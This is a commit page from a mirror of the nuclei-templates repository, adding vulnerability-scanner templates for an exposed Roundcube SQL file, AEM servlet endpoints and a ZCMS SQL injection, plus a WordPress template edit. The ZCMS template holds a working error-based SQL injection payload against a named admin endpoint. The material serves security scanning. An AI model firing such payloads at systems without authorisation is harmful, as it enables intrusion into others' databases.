daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates

patch-1
Noam Rathaus 2021-04-27 14:02:16 +03:00
parent f55bb45e75 3529ed2af6
commit 3bdb2fdbd4
6 changed files with 96 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
README.md
View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 297 | vulnerabilities | 139 | exposed-panels | 122 |
| takeovers | 67 | exposures | 88 | technologies | 64 |
| cves | 297 | vulnerabilities | 140 | exposed-panels | 122 |
| takeovers | 67 | exposures | 89 | technologies | 64 |
| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 |
| default-logins | 24 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 8 | helpers | 8 | iot | 11 |
**102 directories, 1021 files**.
**102 directories, 1025 files**.
</td>
</tr>

24
exposures/backups/exposed-mysql-initial.yaml Normal file
View File

@ -0,0 +1,24 @@
id: exposed-mysql-initial
info:
name: Exposed mysql.initial
author: ELSFA7110
severity: info
reference: https://hackerone.com/reports/1081817
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/mysql.initial.sql"
matchers-condition: and
matchers:
- type: word
words:
- "Roundcube Webmail initial database structure"
part: body
- type: status
status:
- 200

23
misconfiguration/aem/aem-bg-servlet.yaml Normal file
View File

@ -0,0 +1,23 @@
id: aem-bg-servlet
info:
author: DhiyaneshDk
name: AEM BG-Servlets
severity: info
reference: https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212
tags: aem
requests:
- method: GET
path:
- '{{BaseURL}}/system/bgservlets/test.css'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<br/>Flushing output<br/>'

24
misconfiguration/aem/aem-login-status.yaml Normal file
View File

@ -0,0 +1,24 @@
id: aem-login-status
info:
author: DhiyaneshDk
name: AEM Login Status
severity: info
reference: https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212
tags: aem
requests:
- method: GET
path:
- '{{BaseURL}}/system/sling/loginstatus.css'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'CREDENTIAL_CHALLENGE'
condition: and

21
vulnerabilities/other/zcms-v3-sqli.yaml Normal file
View File

@ -0,0 +1,21 @@
id: zcms-v3-sqli
info:
name: ZCMS SQL Injection
author: princechaddha
severity: high
reference: https://www.anquanke.com/post/id/183241
tags: zcms,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "6f7c6dcbc380aac3bcba1f9fccec991e"
part: body

1
vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
View File

@ -68,6 +68,7 @@ requests:
- "PHP Version"
- "Configuration Command"
part: body
condition: and
- type: word
words:
- 'text/html'